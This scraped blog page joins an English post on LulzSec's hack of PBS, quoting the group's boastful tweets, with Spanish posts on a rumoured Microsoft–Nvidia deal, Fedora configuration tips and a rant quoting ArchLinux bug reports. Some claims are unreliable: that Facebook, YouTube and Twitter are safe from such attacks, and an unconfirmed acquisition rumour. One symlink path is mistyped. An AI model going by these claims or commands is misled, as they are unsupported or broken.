Bragging On Twitter
The programmers are particularly active on Twitter, and not shy about their future objectives, or their present conquests. Here's sample from their Twitter page https://twitter.comLulzSec:
LulzSec The Lulz Boat Hey @PBS admins, you still trying to regain control? The Lulz Boat sails through your horrendously-outdated kernels! #Sownage next, folks. 5 hours ago Favorite Retweet Reply
LulzSec The Lulz Boat Sony happens when Sony happens - we're celebrating our victory right now. The fun will never stop! 6 hours ago Favorite Retweet Reply
LulzSec The Lulz Boat We dominate their entire stupid website. Selling custom blog.pbs.org domains, php/user included, lulzsec@hushmail.com - 2 BitCoins each! 6 hours ago Favorite Retweet Reply
LulzSec The Lulz Boat Oh yes, that's right... #Sownage tomorrow. We hope. We decided to obliterate @PBS instead out of distraction. *heads off to the Lulz Cabin* 9 hours ago Favorite Retweet Reply
LulzSec The Lulz Boat @ @ShiverMeTimbres PBS can't recover much, all their base are belong to us. They only broke the file that lets you read articles. 11 hours ago Favorite Retweet Reply
LulzSec The Lulz Boat We're working on another Sony operation. We've condensed all our excited tweets into this one: this is the beginning of the end for Sony. 26 May Favorite Retweet Reply
As of this writing, it looks like PBS has regained control of the articles section of website: http://www.pbs.org/newshour/rundown/a and Newshour reports on Twitter:
FYI: None of our visitors' personal information or emails were compromised during last night's incident ^TG
But LulzSec says that's the only part that PBS controls, so while all may seem OK, it's not. The PBS website is still largely under LulzSec's control, according to LulzSec.
(An observation: what's good about Twitter, is that PBS Newshour was able to use it not just to report the hack, but to explain the false Tupac news.)
Chester Wisniewski's Annoying Blog Post.
A network security specialist named Chester Wisniewski posted a rather annoying blog entry at his Naked Security blog site. This set of paragraphs Mr. Wisniewski wrote below was particularly troublesome to this blogger:
While PBS is the victim here, the passwords disclosed for most affiliates are embarrassingly predictable.
There was absolutely no skill involved in this attack, as it used freely available tools to exploit the databases. The attackers represent nothing more than what many historically thought of as hackers: people creating chaos with no other purpose than gaining fame, irrespective of the damage caused.
The attack is nearly identical to the recent attack against SonyMusic.co.jp. LulzSec used the same tool to attack the Sony website, although far less sensitive information was disclosed in the Sony attack.
Several other databases were disclosed, some including plain text passwords, others using hashes. It is unfortunate that PBS was vulnerable to this kind of attack and even worse that so many passwords were stored in clear text. Revealing this information is criminal and there are certainly more respectable ways of disclosing flaws than exposing so many users' passwords.
To write that there was "absolutely no skill involved in this attack" is nothing more than one programmer dissing another, and helping no one. The fact is, LulzSec did it, and is ways that aren't familiar to the general public. That makes them what? A specialist with a skill - a dangerous and effective one that impacts millions of people.
If what LulzSec did called for "no skill" then Chester Wisniewski should have posted the mathods to fix the gaps in their website security. He did not do that. If the problem is an SQL injection flaw, which is how LulzSec entered both the PBS and Sony website systems, then why not show how to spot the problem and fix it - as I did here, noting Steve Friedl's website
Facebook, Twitter, Safe
That LulzSec was able to easily hack into the websites of large, traditional brands, means that new media companies with far more secure website systems are safe, specifically Facebook, YouTube, and Twitter, to name some of them. 
The point of all this really should be to work with Internet entrepreneurs who build large, database-driven website companies, and not just any programmer on the block, in developing website protection systems that are extremely secure.  As LulzSec claims, "no one is safe" and that may be,  but you can make your website more safe than the next website.

Los 90' han vuelto?, un twett de 2600 el dia 4 de Junio 2011

2600 Magazine
hace 22 horas

Intesante no?

4 jun 2011

Microsoft consigue un acuerdo para una posible adquisición de Nvidia

Si con la compra de Skype y la más que probable adquisición de Nokia ya nos ha sorprendido, esta noticia nos deja directamente con la imagen mental de Steve Ballmer paseándose por un supermercado de compañías, carrito y lista de la compra en mano. Information Week tiene la exclusiva: Microsoft puede adquirir Nvidia tras conseguir un acuerdo de adquisición con el fabricante.
Gracias a ese acuerdo, Nvidia se blinda contra cualquier intento de compra por parte de la competencia de Microsoft, que tendría derecho a vetar esos intentos para poder absorberla (la fuente habla de unos 3400 millones de dólares por el 30% de Nvidia, el porcentaje mínimo de la compra para este acuerdo). Viendo los planes que presentó el gigante de Redmond con Windows 8 y su camino a través de tablets equipados con chips ARM la adquisición de la compañía cobra sentido, al mismo tiempo que empezamos a envidiar fuertemente sus cuentas corrientes capaces de soportar tanta compra. Si Microsoft controlara Nvidia conseguiría ventaja a la hora de fabricar chips optimizados para Windows.
También podría ser que Microsoft se viera en cierto modo obligada a adquirir Nvidia, como un seguro para impedir que sufra escasez de componentes mientras que la industria de los tablets de la competencia sigue adelantándose. No hay confirmación oficial de Microsoft por el momento.

Steve Ballmer... Adolf Hitler?

3 jun 2011

Fuentes GTK en Fedora KDE | GTK fonts in Fedora KDE

En Fedora KDE, los seteos de fuentes especificados en configuracion de sistema de KDE y aplicados a GTK, usando oxygen-gtk no funcionan como deberian, las fuentes de todo GTK se ven mal, firefox, xchat, gimp, paginas web, etc, la solucion?, muy simple, mas de lo que creen, en muchos foros de fedora u otros mencionan instalar un beta de freetype2 y no es asi.
Para que las aplicaciones GTK se vean bien, es necesario que este activo el autohint para todo el sistema, cosa que en version GNOME lo hace gnome setting, pero en KDE no, esto se arregla asi:

primero instalamos estos paquetes asi:

yum install freetype.x86_64 freetype-freeworld.x86_64


Si es 32 bit .i686
Luego como root vamos a /etc/fonts/conf.d/ y hacemos esto.

ln -s /etc/fonts/conf.avail/10-autohint.conf 10-autohint.conf
ln -s /etc/fonts/conf.aval/70-no-bitmaps.conf 70-no-bitmaps.conf

Con eso tenemos activo autohint para todo el sistema y se veran bien las fuentes GTK, y de paso desactivamos las fuentes bit map que son muy feas, reiniciamos las X o el sistema para que tome la nueva configuracion y eso es todo.

2 jun 2011

Mentiras y mas mentiras... Allan McRae

En unos dias hare un detallado analisis de Fedora 15, distro a la cual volví y nunca debería haberme ido, pero la entrada a que viene?.
Segun Allan McRae, un developer de ArchLinux Sucks, el hecho de que GCC no compile un kernel por poseer variables declaradas pero no usadas, es una restriccion de GCC y es un problema del codigo del kernel, no de GCC.
Para mi gratisima sorpresa, compile un vanilla kernel, misma rama, en Fedora 15 usando GCC 4.6, la misma rama que ArchLinux Sucks, pero por lo que vi en las listas de mail, esta parcheado, dado que se reconoce un error en el, cosa que Allan no reconoce y tampoco parchea... Debian tambien lo ha parcheado, y GNU informa que la version 4.6.1 sera corregido el bug.
Un consejo, Allan, dedicate a otra cosa!, que para developer te queda grande el titulo!.

GCC multilib Fedora 15 | compilacion cruzada

Muchos estareis acostumbrados a instalar gcc-multilib al usar distros de 64 bit, como ser Ubuntu o ArchLinux, pero en Fedora notaran que el paquete solo se llama "gcc.x86_64 : Various compilers (C, C++, Objective-C, Java, ...)" y no multilib. Al intentar hacer una compilacion cruzada, es decir, desde un equipo 64 bit, compilar para 32 bit, con el parametro gcc -m32 test.c -o test tendran un error, como solucionarlo?, pasos:

yum install glibc.i686 glibc-static.i686 glibc-devel.i686 libgcc.i686

Eso es todo, ahora podemos hacer compilaciones cruzadas, no eran tan dificil no?.

20 may 2011

La incompetencia de los developers de ArchLinux expuesta | The ArchLinux decadency exposed

El dia de hoy, decidi darle una patada en el culo a ArchLinux, o como dice un amigo "garchilinux", esta distro que tanto idolatran sin saber realmente. El que tiene un poco mas de conocimiento, se puede dar cuenta que es una reverenda basura, y no son solo palabras, voy a hacer algo que me venia callando, pero hoy es el dia en que me harte, mi paciencia se colmo y llego un punto donde no puedo dejar de mostrar al mundo las respuestas de estos tipos y sobre todo como cierran los bug (que saben que son reales y por SU culpa) rapidamente antes de que alguien mas los vea, pero se joden, porque aca los posteo. Me importa nada si luego asocian el user con el texto en el blog, es real, y el que quiera ocultarlo, puede comentar, refutar, que no sera censurado, tiene derecho a replica; y si no entiende español, que se pele el culo como yo usando Google Translate para entender -si realmente le interesa-.

Todo comenzo cuando reporte un bug sobre xfce y le digo a Andreas Radke que se debia a las librerias de GCC, dado que habia visto eso mismo en muchos foros, y me contesta para mi sorpresa, el mismo empaquetador, él, que no recuerda con que version de gcc lo compilo, increible no?.
Luego toma partido un tal Rémy, donde me borra los link que habia posteado sobre undefined symbols relacionados a gcc 4.6 y me explica muy amablemente los pasos a seguir y que como ya habia dictaminado yo, no ellos, que era el paquete xfce4-goodies, que probara uno a uno a ver cual era el fallado, ahora, no es trabajo de un "developer" hacer eso aunque mas no sea en una virtual machine?, es broma?.
Sumo a esto que dias mas tarde tras un update de la muerte, como suelen ser los de archlinux, del paquete libxfce4ui version 4.8.0-2, me quedo sin desktop y tarda mas de 10 segundos en iniciar el mismo luego de startx, para hacer un downgrade y ver que el error se corregia.
Noto al momento que esa version pertenece a Debian Sid, o sea, unstable, y es donde pregunto en el mismo bugtracker, quien toma las decisiones, si existe un equipo de control de calidad, a lo que me responde Rémy que no, que las cosas pasan de testing a stable cuando nadie reporta bugs; es decir, los usuarios de testing, a ver si entendemos este punto, son los que si reportan se ve y si no reportan, pasa derecho, asi es como existe gnome shell con memory leak, mismo articulo en este blog.
A ver, señores, todos los usuarios no son coder ni yo mismo lo soy al nivel que necesita una distro, y tampoco reportan todo como yo, sinceramente es bastante denso estar cada 2 dias reportando bugs una y otra vez, por tanto, la confianza de que todo ande bien depende de si los usuarios desean reportarlo, increible nuevamente el proceso de testeo, comparado con Gentoo que tambien es rolling pero los ports son altamente probados y ademas se usan parches, cosa que la gente de ArchLinux no usa, no se si porque es su filosofia, porque no saben o porque les da alergia el comando patch.
Todo culmina cuando el gcc se upgradea a 4.6.0-5 y no logro compilar un solo kernel, a ver señores, llevo al menos 2 años compilando kernel's, mejorandolos, haciendo hacking en sus makefile, usando flags donde no debo y jamas tuve problemas, asi que evidentemente esto no es un problema mio, asi que busque el problema y di con el.
Aclaro, que uso kernel propios porque se me hace mejor un kernel con mis modulos y solo con mis cosas, a mi gusto, con mis parches y con las cosas empotradas y no modulares, vamos, que no ando cambiando el chipset cada semana!.
Doy con el problema, y resulta que lo veo en una lista de bug report de Debian Sid, con el gcc 4.6, hago los test que se describen alli y veo que el gcc de ArchLinux se comporta de igual forma en todos los casos (no por el hecho de devolver 0 o 1, sino por el exceso de warning que conlleva a no compilar), es decir, mal, por tanto concluyo que el problema es ese, el gcc, no yo, no el kernel, no la pc, no la presion atmosferica.
En base a esto, con mis mejores ganas, porque hay gente que ni ganas tiene, me pongo a probar y reportar para que mejoren el tema y poder volver a tener un sistema estable como tenia antes. Claro, ahora ya es tarde para volver al gcc 4.5.2 no pueden, aunque quisieran, porque todo lo que esta en los repos esta compilado con el 4.6 y lo que posee mucha gente en sus PC, por tanto si cambian las librerias harian la distro inservible.
Paso a pegar los bug report, y luego comentare al final, pero lean por favor los bug report:

FS#24355 - [gcc 4.6.0-5] [-Wunused-but-set-variable] 

Details

Description:

gcc 4.6.0-5 not finish compile a vanilla kernel with steps:

make menuconfig (previous .config from slackware 13.37 with gcc 4.5.2 and work fine)
make bzImage - Fail at finish time with various errors

I see an error in debian bug list, and the _same_ error i can reproduce in x86 and x86_64 system ArchLinux (have 1 notebook and 1 desktop)

Test it:

test.c:
----------------------------------------------------------
#include <stdio.h>

int main(void)
{
int x;
x = printf("hello, world\n");
return 0;
}
-----------------------------------------------------------
gcc -Wall -Werror test.c; echo $?

test.c: En la función ‘main’:
test.c:5:13: error: se define la variable ‘x’ pero no se usa [-Werror=unused-but-set-variable]
cc1: todos los avisos se tratan como errores

1

------------------------------------------------------------

gcc -Werror=unused-but-set-variable test.c; echo $?

test.c: En la función ‘main’:
test.c:5:13: error: se define la variable ‘x’ pero no se usa [-Werror=unused-but-set-variable]
cc1: algunos avisos se tratan como errores

1
-------------------------------------------------------------
gcc -Werror=unused-but-set-variable test.c; echo $?

test.c: En la función ‘main’:
test.c:5:13: error: se define la variable ‘x’ pero no se usa [-Werror=unused-but-set-variable]
cc1: algunos avisos se tratan como errores

1
--------------------------------------------------------------

The same problem is reported in debian, reference:

http://lists.debian.org/debian-gcc/2011/02/msg00107.html


Additional info:
* package version(s)
* config and/or log files etc.
System up to date, archlinux_x86 stable and archlinux_x86_64 stable, the same error. Using xfce or kde in both machines.

note: if you need me to translate the texts in Spanish just ask him

Steps to reproduce:
This task depends upon

Closed by  Andreas Radke (AndyRTR)
Friday, 20 May 2011, 05:22 GMT-3
Reason for closing:  Not a bug
Additional comments about closing:  The kernel does compile with our safe preset flags in makepkg.conf. Using custom flags is your fun (probably has to be fixed in the kernel code).
Comment by jelle van der waa (jelly) - Friday, 20 May 2011, 05:01 GMT-3
could you please attach the output to the bug report and use LANG=C your command
http://allanmcrae.com/2011/05/how-to-file-a-bug-report/
Creo que fui lo suficientemente claro como para que lo cerraran, no creen?, ok, intento de nuevo y esta vez fui insolente al punto de arriesgarme a que me patearan o quien sabe que cosa, pero veo que Allan se hizo cargo y Ionut Biru, un joven rumano que creo que es genial en lo que hace, comento debajo que ni el entendia porque Andreas Radke habia cerrado el bug y que era claro que era el gcc y no yo!, pego el bug report:

FS#24359 - [gcc 4.6.0-5] [-Wunused-but-set-variable] 

 

Details

Prologue:

Andreas Radke Wrote:


 FS#24355
bug

"closing: The kernel does compile with our safe preset flags in makepkg.conf. Using custom flags is your fun (probably has to be fixed in the kernel code)."

NOTE FOR ANDREAS RADKE:

1) I did not add extra flags to kernel compilation, i take .config file of ARCH kernel and only removed unnecesary features, for example: I use AMD, so I'd remove "Intel Speed step", i do not have WiFi, so I'd remove "wireless support", ok? is _now_ clear enough for you?

2) In Fedora, Slackware, Gentoo, Debian, X-Men-Linux the kernel respete a standard, in archlinux also used to do it until GCC 4.5.2, steps:

cp /usr/src/linux-2.6.38-ARCH/.config /usr/src/linux-2.6.38.6/.config

cd /usr/src/linux-2.6.38.6/

make menuconfig

(remove a lot of unnecesary modules)

make -jX (X== number of cores + 1)
make modules_install
make install
mkinitcpio -k 2.6.38.6 -c /etc/mkinitcpio.conf -g /boot/vmlinuz-2.6.38.6.img
mv /boot/vmlinuz /boot/vmlinuz-2.6.38.6

Add all in new line in /boot/grub/menu.lst and reboot
It is standard in all distros, is into README of kernel and works fine with GCC 4.5.2 in all arch.

Clearly my "fun", as you call it, is not a reason for closing the bug at any case you could ask me to report it to upstream, do not ignore the bug please, a lot of users that use custom kernel and software are affected.
The /etc/makepkg.conf is not used in this procedure, i do not use PKGBUILD (for kernel compilation), a kernel is source code, is not necesary to package it.
The description show cleary the bug in gcc, and is reported in Debian sid, unstable, if ArchLinux use the equivalent to Debian sid packages, ok, is no my problem, but i see necessary to report the bug, do you get me?.
Sorry by the """rude""" mode, but i'm not used to receive such obvious answers and less without waiting a feedback from me before that; i like to report bugs cause i like to help to improve things, if i'm being annoying, then just say it and i will take a desicion.



Description:

content of test.c:

#include <stdio.h>

int main(void)
{
int x;
x = printf("hello, world\n");
return 0;
}


-------------------------------------------------------------

LANG=C gcc -Wall -Werror test.c; echo $?

test.c: In function 'main':
test.c:5:13: error: variable 'x' set but not used [-Werror=unused-but-set-variable]
cc1: all warnings being treated as errors

1
------------------------------------------------------------------
LANG=C gcc -Wunused-but-set-variable -Werror test.c; echo $?

test.c: In function 'main':
test.c:5:13: error: variable 'x' set but not used [-Werror=unused-but-set-variable]
cc1: all warnings being treated as errors

1
----------------------------------------------------------------------
LANG=C gcc -Werror=unused-but-set-variable test.c; echo $?

test.c: In function 'main':
test.c:5:13: error: variable 'x' set but not used [-Werror=unused-but-set-variable]
cc1: some warnings being treated as errors

1
-----------------------------------------------------------------------

In fact, i reproduce the same bug that Debian report in Sid, in Arch 32 and 64 bits, so, GCC is buggy, is not only the kernel, the kernel is just the proof of what those bugs produce in a code of thousands of lines.
I did observe that you apply a patch to kernel source code before compiling it.

See the link and the comments on it, read please:

http://lists.debian.org/debian-gcc/2011/02/msg00107.html

Thanks to jelle van der waa for the tip, is helpful ;) (LANG=C)

Regards
This task depends upon

Comment by Ionut Biru (wonder) - Friday, 20 May 2011, 08:51 GMT-3
i found it silly that you actually open a new bug instead of asking for reopen. Also i found it funny that the bug was closed with that comment. clearly x variable is used and gcc is bugged
Comment by synflag (synflag) - Friday, 20 May 2011, 09:18 GMT-3 Edit
@Ionut

1.- if true, but I do not like asking for the reopening of a bug
2.- totally agree with you, I find it funny and even ignorant of the reason for the closure, it is clear the bug and the explanation, and that had nothing to do with the way I use to compile with the bug, but the compilation failed was the product of bug I do not use patches and never necessary, even I could build 4.6.0-4, had warnings but compiled perfectly, even changing the flag, and suddenly without changing anything and use the Arch configuration does not compile on any architecture Or what is bad and not the result is useless.
3.- Yes, i'm not a coder but i can recognize the obvious variable and the no related warning.

Comment by Gaetan Bisson (vesath) - Friday, 20 May 2011, 09:40 GMT-3
The Debian bug report complains that the return code of GCC is wrong (should be non-zero since an error occurred, but was not); here, the return code is perfectly fine.
So what "bug" in GCC are you reporting?

GCC emits a warning when you don't use a variable (just setting it doesn't count as using); with -Werror, all warnings are fatal so compilation aborts - this behavior is completely normal to me.
Comment by synflag (synflag) - Friday, 20 May 2011, 10:13 GMT-3 Edit
@Gaetan try compile a vanilla kernel with traditional way and using gcc 4.6.0-5, 2.6.38.6 for example, or 2.6.37.6 slackware kernel from kernel.org, before i compile without any problem, and no use PKGBUILD, now, i can not compile a functionally kernel after update.
With 4.5.2 version of gcc is normal "variable is declared but not used" while is make executed, in 4.6.0-5 the message is -Wunused-but-set-variable a _lot_ of times, finish in defected binary or never produce bzImage or modules.dep is ausent, or modules corrupted. Then, all code of linux kernel is bad?, why using 4.5.2 compile fine and work fine without errors during days, uptimes of 10, 15 or more days.

I have this same issue compiling kernels http://comments.gmane.org/gmane.comp.emulators.qemu/100631 (not exactly fpu bug but 4.6 not compile)
Comment by Gaetan Bisson (vesath) - Friday, 20 May 2011, 11:05 GMT-3
I am happy with Arch stock kernel, thank you.

The point is, you build stuff with "-Werror" and it raises an error when you have unused variable; that is expected. (GCC-4.6 probably just became stricter in the way it handles/detects unused variables.)

Just do not compile with "-Werror".
Comment by synflag (synflag) - Friday, 20 May 2011, 11:26 GMT-3 Edit
@Gaetan i do not use -Werror, only take the vanilla kernel and configure .config file, i did not touch the Makefile, so the fix is to modify Makefile?, Torvalds makes so bad his work?, doesn't he know that gcc 4.6 exists?.
Gaetan, i'm not happy with the stock kernel, if i want to use all system by default i would use Ubuntu. The advantage of ArchLinux is it's phylosophy KISS and flexibility (custom kernel, packages, AUR as an example of this). Beside 2.6.38.6 kernel has trouble with AMD Athlon family (my cpu), and has randomized kernel panics (not reported because is a bug in upstream), https://lkml.org/lkml/2011/5/14/108
The kernel 2.6.38.3 work fine, and 2.6.37.6 very fine (the branch .38 have ioremap error in GT 240 Nvidia with all drivers, no impact but is present in dmesg).
The lastest versions are not always better, rolling release is a good idea, kamize and no tested packages not, so, i decide wich kernel to compile, considering it's the core of the OS. I take control over the kernel, but not over the gcc, if gcc is wrong, i lost control over the core and stability of my system, i do not have a server, but i work with my machine, so is important for me the mantain the system stable all day long.
Parece que, pese a que Gaetan tiene un master en matematica, la informatica no es lo de el... digo... le gusta usar las cosas como vienen, 0 geekismo, 0 espiritu entusiasta y se adapta mas a lo que son los Ubuntu users o Winusers, sabian que gente como el se encarga de la distro que usas?, terrible no es verdad?


Bueno, un punto a favor no? (lo digo por Ionut), pero esto es como el cuento de la buena pipa, o del tio como lo conocen algunos, o la novia que se va con otro, y te pide perdon y tu la perdonas pero lo vuelve a hacer y es una historia de nunca acabar, asi que mi determinacion de _terminar_ que valga la redundancia, con ArchLinux es definitiva, si voy a tener que subir los tonos para que me escuchen, hacerme mala sangre, ponerme nervioso, no me sirve señores, he reportado cosas a Red Hat y no he tenido estos problemas, al contrario, mal que le pese a muchos que critican esa empresa, pero me dejaban el bug abierto hasta que alguno de ellos traia un RPM fixeado y me pedia que lo pruebe, eso es trabajar y tomarse las cosas en serio.

Ahora viene la parte de xfce:

FS#24122 - [xfdesktop] error with libstdc++.so.6 of gcc 4.6 

Details

Description:

When I logout from session xfce 4.8 in tty1 (i use startx for start desktop and X), I see this message

xfdesktop: symbol lookup error: /usr/lib/libstdc++.so.6: undefined symbol: _ZNSt14error_categoryD2Ev, version GLIBCXX_3.4.15

A few days later of this thing happens repeatedlly xfce desktop gets broken.

Making a downgrade to gcc 4.5.2 this error does not appear, so, i guess is a problem in gcc libs (gcc 4.6), but with gcc 4.5.2 firefox, chromium, virtualbox etc., do not work because they are compiled with gcc 4.6, thus they depend on it.
How can i fix this?.-

Additional info:
* package version(s)
* config and/or log files etc.
xfce 4.8
gcc-multilib-4.6.0-4-x86_64
kernel 2.6.38.5
Xorg 1.10

Steps to reproduce:

Login in tty1, type startx, and logout of xfce session, produces this error in tty1.
This task depends upon

Comment by Andreas Radke (AndyRTR) - Friday, 06 May 2011, 03:49 GMT-3
I'm not sure if the last xfdesktop package has been build with gcc4.5 or 4.6 - can you confirm if a xfdesktop rebuild with gcc4.6 helps?
Comment by synflag (synflag) - Friday, 06 May 2011, 09:45 GMT-3 Edit
@Andreas:

I triyed with several xfdesktop of AUR, git and others, but with no satisfactory results (same error descripted), i even recompiled thunar. If you have any other PKGBUILD or source, tell me how and from to compile it, and i will be glad to test it. Is a shame that a desktop that works so well, was ruined by a poor control of QA by the release of gcc 4.6 without measuring the impact on all areas and software that are related.
i ended up using xfce because gnome3 is terribly buggy and completely unusable (it looks like an Ipad homescreen), KDE is the same s**t with it's "segfault 11" and kded4 daemon hungs up and forks after restarting X. Tell me which method you want me to use to compile and build it (xfdesktop or necessary packages) To see if I can fix this, many thanks in advance for the quick response to the bug report-question.

Note: edited, sorry for my english.
Comment by Robin Hahling (Rolinh) - Saturday, 07 May 2011, 09:52 GMT-3
Well I actually do not think this is strictly related to xfdesktop.
You can reproduce the bug with other programs.
Eg:

[robin@odin ~] % mocp -i
State: STOP
mocp: symbol lookup error: /usr/lib/libstdc++.so.6: undefined symbol: _ZNSt14error_categoryD2Ev, version GLIBCXX_3.4.15
!127! [robin@odin ~] %

Same with Thunar:

[robin@odin ~] % thunar
thunar: symbol lookup error: /usr/lib/libstdc++.so.6: undefined symbol: _ZNSt14error_categoryD2Ev, version GLIBCXX_3.4.15
!127! [robin@odin ~] %

So this is probably a bug in glibc.

EDIT: this bug is probably related https://bugs.archlinux.org/task/23879
Comment by Leonid Isaev (lisaev) - Saturday, 07 May 2011, 13:20 GMT-3
synflag, you are using multilib? In this case, the repo should not be /extra.
I am asking because I could not reproduce your problem with pure 32 and 64 bit xfce installs.
Comment by Jeremy Whiting (jpwhiting) - Saturday, 07 May 2011, 13:43 GMT-3
http://gcc.gnu.org/bugzilla/show_bug.cgi?id=48838 this seems to be the cause (and fix) of the issue. We see it when we try to build kdevplatform also. Downgrading to 4.6.0-3 fixes the issue, maybe making a new version of this package with the fix in gcc repos would be good too.
Comment by Rémy Oudompheng (remyoudompheng) - Saturday, 07 May 2011, 15:09 GMT-3
@jpwhiting: the problem seems completely unrelated

@synflag: xfce is not written in C++. Issues with libstdc++ must come from elsewhere.

Do you have real problems with XFCE ?
Comment by synflag (synflag) - Saturday, 07 May 2011, 23:38 GMT-3 Edit
@remyoudompheng

Yes, i know that xfce is no written in C++, but the bug is reported in gcc.gnu bugzilla and other bug herev FS#24122. Eric Belanger say:
"Comment by Eric Belanger (Snowman) - Saturday, 07 May 2011, 17:20 GMT-3
That's plenty of confirmations. It happens on both arches. After reading a comment in the similar bug FS#24122, I realized that moc is written in c and doesn't even link to /usr/lib/libstdc++.so.6, So it looks like a gcc or glibc issue as other apps are also affected by this."

The problem is that the bug _is present_, and after some days, some features of xfce desktop are broken or with constant restarting.
Comment by Allan McRae (Allan) - Saturday, 07 May 2011, 23:54 GMT-3
The bug is not in gcc.gnu bugzilla anywhere as far as I can tell. If so, please provide a link.

Edit: Note the bug linked here was probably meant for
 FS#24142
and is entirely unreleated...
Comment by Allan McRae (Allan) - Sunday, 08 May 2011, 00:01 GMT-3
@synflag: please be more specific than "some features" are broken. It is hard to figure out what "some features" are to replicate...
Comment by Rémy Oudompheng (remyoudompheng) - Sunday, 08 May 2011, 04:09 GMT-3
@synflag: my XFCE is absolutely not broken, and my mocp is not broken either. You may be using xfce plugins that links to libstdc++.
Comment by synflag (synflag) - Tuesday, 10 May 2011, 06:40 GMT-3 Edit
@Allan

Mouse pointers, init daemon at start desktop (the setted daemon to run not run in some times), the xfce panel dissapear aleatory.
I use 64 bit, i don't know if the bug is present in i686.
So... the desktop broke parts randomized, and plugins addons, wheater, time, etc.
Anyway, maybe they can replicate the fault or not, but the error appears in the libraries that I do not think that is something not casually, and is linked 100% to gcc 4.6.0, when using the gcc 4.5.2 libs do not see these errors.
So, is a bug in gcc 4.6 libs, test Allan and Rémy, start XFCE with startx, and close session from the menu, and in tty1 (where startx executed) the error is clear, now,remove all gcc 4.6 packages and use arm with 4.5.2, the error no appear, i'm no crazy.

https://bugs.archlinux.org/task/23879
Comment by synflag (synflag) - Tuesday, 10 May 2011, 06:42 GMT-3 Edit
Comment by Rémy Oudompheng (remyoudompheng) - Wednesday, 11 May 2011, 02:14 GMT-3
synflag: please try to not post completely random links that have nothing ot do with your problem. This adds noise to the discussion and doesn't help in any way. Instead, proceed in a systematic way:
- tell us whether the message appears only when you logout or it is was already there while your session is running
- don't mix your report with seemingly unrelated problems like "Mouse pointers, init daemon at start desktop (the setted daemon to run not run in some times)"
- attach the output of "lsof -c xfdesktop"
- nobody said you're crazy, I just said the bug does not exist at all on my system. It is possible that you use plugins that exhibit the problem
- the fix is not to downgrade gcc, but to correct programs.
Comment by synflag (synflag) - Wednesday, 18 May 2011, 04:07 GMT-3 Edit
Rémy,

1.- The message appear when close session, is described in the report, startx, ctrl+alt+F1 no message, app menu, exit, and the message is present in tty1 (where executed startx)
2.- No mix nothing, i say: mouse pointer, init script (apps that run at start xfce desktop), and panels crashed on few days
3.- Attached
4.- Rémy, ok, is true, nodoby say that i am crazy, but, is frustating report and repot and repot and i can see that the most or all devs respond "works for me"..... well, no all systems are identic in hardware, software, etc. Sorry but in some times i feel that arch devs ignore me or ignore que minor bugs, i work with other distros and no is frecuent this bug's
5.- I know, but is a problem with gcc libs, i know, is evident

Note: no random link, all links are related with regression in gcc 4.6 and c++ compatibility. The problem is solved in a fresh install, if i install xfce4-goodies the bug is present, if only install xarchiver, wheater the bug is not present, so, is related to some c++ code in goodies in conflict to libs of gcc 4.6.0-5, then, is true, gcc 4.6 is a problem, is a bad very bad decision move of testing to stable, have problems related with some software, i.e.; xfce4-goodies, if using gcc 4.5.2 libs not appear que bug, then, is the gcc, no xfce.
Extra question, who take decicions about move testing to stable?, is really tested?, exists a QA team?, beta testers?, i don't think, very bad, is not your problem Rémy, is a problem of ArchLinux, if the archlinux way continue by the "ubuntu way" (bug and more bug), i will be migrate to other distro, gentoo for example, your ports is tested a lot of times. Sorry for the extra-comment, but i want talk to dev's of any body for talk about of QA in arch, extra data: Some archlinux developers confesated me in private irc channel of archlinux in freenode that want migrate to other distro, for this reason (no QA control), i never lies, is true, well, reegards Rémy.
Thanks for help me
sorry my english.
Comment by Rémy Oudompheng (remyoudompheng) - Wednesday, 18 May 2011, 14:13 GMT-3
Hello synflag,

4. we don't say "works for me" just for the sake of saying it: we say it because we have absolutely no idea about what the problem. We are not geniuses, and we honestly say that we don't know what the problem is.
5. no, it is not obvious that the problem comes from gcc-libs. As you can see from the patch I attached for
 FS#23879
.
- could you try not to install all xfce4-goodies ? Just install one goodie and tell us which goodie triggers the bug, it will be very help ful.

- your links are random: I can google "undefined symbol" myself. I understand that you may think some links are useful, but please don't post a link unless you understand it and you can tell why it is important. If you cannot say why your link is useful, don't post it. Undefined symbol is a pretty generic error that happens in various, very different situations
- we have no assigned team of testers. Anyone can test packages in [testing] and report bugs. If no-one tests packages, then it means no-one cares about QA.
- users are free to change distributions. I personally do not consider this as a problem. Only bugs/feature requests are problems.
Comment by Allan McRae (Allan) - Thursday, 19 May 2011, 01:56 GMT-3
  • Field changed: Status (Assigned → Waiting on Response)
> Just install one goodie and tell us which goodie triggers the bug, it will be very helpful.

In fact, that is what is required to move forward in fixing this issue.
Comment by Leonid Isaev (lisaev) - Thursday, 19 May 2011, 11:18 GMT-3
xfce4-xkb-plugin is OK here (as well as xarchiver). If this is a problem with xfce4-goodies, why does the title say [xfdesktop]?
Insolito no es verdad? el empaquetador no sabe con que compilo.... y si, es el miren:
pacman -Si libxfce4ui
Repositorio       : extra
Nombre            : libxfce4ui
Versión           : 4.8.0-2
URL               : http://www.xfce.org/
Licencias         : GPL2
Grupos            : Nada
Provee            : Nada                                                                                                                     
Depende de        : libxfce4util>=4.8.0  gtk2  xfconf>=4.8.0  startup-notification                                                           
Dep. opcionales   : glade: for using the included glade module                                                                               
En conflicto con    : Nada                                                                                                                   
Reemplaza a         : Nada
Tamaño de descarga:  68,70 K
Tamaño instalado  : 598,00 K
Empaquetador      : Andreas Radke <andyrtr@archlinux.org>
Arquitectura      : i686
Fecha de compilación : mié 18 may 2011 13:34:11 ART
Suma MD5          : 4e7e22e88a383cc25b845e800dc9f5c9
Descripción       : share commonly used Xfce widgets among the Xfce applications
Ok, sigamos con el otro:

FS#24339 - [libxfce4ui] 4.8.0-2 crash the desktop 

Details

Description:
After update of libxfce4ui 4.8.0-1 to libxfce4ui 4.8.0-2, the desktop crashly totally, description:

1.- startx in tty1
2.- 8 seconds for show desktop (4 cores cpu and 8gb of ram)
3.- show desktop and after 5 seconds no show desktop anymore (home folder, icons, disk mounted, wallpaper)
4.- in tty1 the message is "other window manager is running"

Additional info:
* package version(s)
* config and/or log files etc.

libxfce4ui 4.8.0-2 is buggy.
Downgrade from /var/cache/pacman/pkg/ to 4.8.0-1 and bug is no present, so, -2 version is buggy.

Note: see the FS#24122 task, some body test any pkg before upload to repos?.


Steps to reproduce:
This task depends upon

Comment by Zhehao Mao (zhehao) - Wednesday, 18 May 2011, 21:17 GMT-3
I am having a similar problem. After starting xfce with startx, it takes a while for the window manager to fully load. I also get an error message "Failed to load the desktop folder. File enumerator has outstanding operation". synflag, how do I downgrade to the previous non-buggy version?
